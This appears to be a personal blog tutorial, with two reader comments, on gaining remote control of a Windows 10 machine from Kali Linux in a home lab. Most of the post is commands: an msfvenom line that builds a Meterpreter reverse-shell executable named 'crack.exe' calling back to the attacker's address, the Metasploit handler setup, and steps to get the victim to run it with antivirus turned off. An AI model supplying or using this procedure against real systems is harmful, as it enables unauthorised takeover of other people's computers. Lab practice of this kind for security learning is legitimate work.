This Practical is For Educational Purpose only.
Hello everyone, this blog is related to exploiting windows system(win-10) using Kali Linux.
So, basically we need two operating systems, First one is kali(attacker) and second one is Windows(victim).
This Practical works when both of the machines are in same network.
So. I have installed Kali-linux and windows-10 in Virtualbox.
And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network,
This also works if you have host machine kali and on other side you have windows-10(PC) with you.
You can also install kali on Virtualbox and set it to NAT network(Bridge is recommended).
For surety u can ping the windows 10 machine from Kali to check that the machines are on same network or not.
Practical Starts Here -
1. go to kali terminal and type the following command.
type your kali ip instead of 10.0.2.4
msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=10.0.2.4 -f exe > ~/Desktop/crack.exe
3. Now again type the following commands to the terminal
msfdb init
4. Type following Commands in terminal.(don't close the terminal window after executing last command)
type your kali ip instead of 10.0.2.4
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 8080
set lhost 10.0.2.4
exploit
5.Now Manage to move that crack.exe file from your kali to windows.
(Before copying or executing that file make sure that that your antivirus program is turned off)
after turning off antivirus execute crack.exe
7. after execution of that file, you will see that the kali got the session,
You will see the following message.
8. Now you can control the windows system from meterpreter.
I am writing command sysinfo, this command show me the system info of that system,
there are bunch of more commands available here, you can see them by typing help.
Thats it You are in that System.
Thankyou
JAYRAJSINH CHAUHAN...
Nice one. Keep it up 👍🏻
ReplyDeletegood one👍
ReplyDelete